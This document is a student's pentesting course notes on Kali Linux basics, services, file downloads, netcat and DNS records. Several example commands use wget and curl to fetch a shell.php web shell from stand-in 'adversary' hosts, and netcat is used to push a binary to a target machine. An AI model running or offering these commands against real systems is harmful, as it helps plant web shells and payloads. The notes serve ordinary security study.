# PENTESTING NOTES
RULES
1. MUST FOLLOW THE LEARNING PYRAMID
2. MUST ADHERE TO RULE #1
3. TRY HARDER
1. DRINK WATER
# INTRODUCING MYSELF
> I am Moses Ateka alias *0x11/VJ XI*, Cybersecurity student, Gamer and one hell of a looser. I am currently doing penetration and testing as a fulltime profession.
> I like playing CTFs, Solving Labs and Interacting with different people.
*hope I will get throgh this*
# Penetration Testing With Kali Linux
> course is a basic course in penetration testing. Those who are new to Offensive Security courses should start with this course. This course introduces penetration testing tools and methods through hands-on experience
# ****KICK OFF!!!
# Finding My Way Around Kali
Kali Linux adheres to the filesytem hierachy standard (FHS), which provides a familiar and universal layout for all linux users
most useful directories
* **/bin** -basic programs(ls, cd)
* **/sbin** -system programs(fdisk, sysctl)
* **/etc** -configuration files
* **/tmp**-temporary files
* **/usr/bin**-applications(nmap,ncat)
* **/usr/share** - application support data files
# Basic Linux commands
# > man pages
* Most executable programs intended for the Linux command line provide a formal piece of documentation often called manual or man pages.
ex:
```
man ls
```
# > arpropos
* withis command we can search the list of man page descriptions for a possible match based keyword
ex:
```
apropos partition
```
# > Listing files
* The *ls command* prints out basic file listing to the screen
ex:
```
ls /Documents
```
```
ls -al
```
```
ls -lt
```
# > Moving around
* all files and folders are children of the root directory. represented by the "/" character.
* We can use *cd* command to followed by patch to change
ex:
```
cd /Downloads
```
```
cd /usr/share/wordlists/
```
* The *pwd* command prints our current working directory which comes in hand if you are lost.
# > Creating directories
* The *mkdir* command followed by the name of a directory creates the specified directory.
* WE can also create multiple directories at once with *mkdir -p* command
```
mkdir -p /test{recon,exploit,report}
```
# > Finding files
* There are 3 main commands used to find files in Linux:
1. find
2. locate
3. which
* find command is the most complex and flexible among the three.
# Managing Kali Linux Services
# > SSH service
* The secure shell(ssh) is used mostly to access a computer remotely using a secure encrypted protocol.
* It's a TCP-based and listens by default on port 22
* To start SSH we use *systemctl* with the *start* option followed with the service name:
```
sudo systemctl start ssh
```
* we can also pass the following command if we wanted to enable ssh service at boot time ( as every mf prefers). but change the default password first.
```
sudo systemctl enable ssh
```
# > HTTP service
* Apache HTTP service is often used during a pentest either for hosting or providing a platform for downloading files to a victim PC
* It's also a TCP-based listens at port 80 by default.
```
sudo systemctl start apache2
```
```
sudo systemctl enable apache2
```
> That winds up my interaction with Kali, the rest I am confident enough with them.....
# Downloading files
# > wget
* used extensively to download files using the HTTPS/HTTP and FTP protocols
```
wget http://adversary.net/shell.php
```
# > curl
* used to transfer files from a server using different protocols such as HTTP,SMB,POP,IMAP,telnet,
```
curl -o shell.php http://adversary.com/shells/shell.php
```
---
---
# Practical Tools
# > Netcat
* the swiss army knife of hacking
* reads and writes data across network connections, using TCP or UDP
```
nc -nv 69.69.69.69 22
```
listening on UDP
```
nc -nlvp 6969
```
Trasferring files with netcat
* on target machine
```
nc -nlvp 4444 > incoming.exe
```
* on adversary machine
```
nc -nv 69.220.133.69 < /usr/share/windows-binaries/wget.exe
```
---
---
---
# Bash scripting
> A Bash script is a plain-text file that contains a series of commands that are executed as if they had
been typed at a terminal prompt
* bash scripts have an optional extension of *.sh* for ease identification.
* the script must begin with *#!/bin/bash* and must have executable permission set beforethey can be executed
# Active information gathering
* This include port scanning and DNS,SMB,NFS,SMTP and SNMP enemuration.
# > DNS enumeration
* The Domain Name System (DNS) 187 is one of the most critical systems on the Internet and is a distributed database responsible for translating user-friendly domain names into IP addresses.
# > common DNS records
* NS - namesever records
* A - host record
* MX -mail exchange record
* PTR -pointer records
* CNAME -Canonical Name Records are used to create aliases for other host records.
* TXT - text records
# >
Sign in with Wallet
Connect another wallet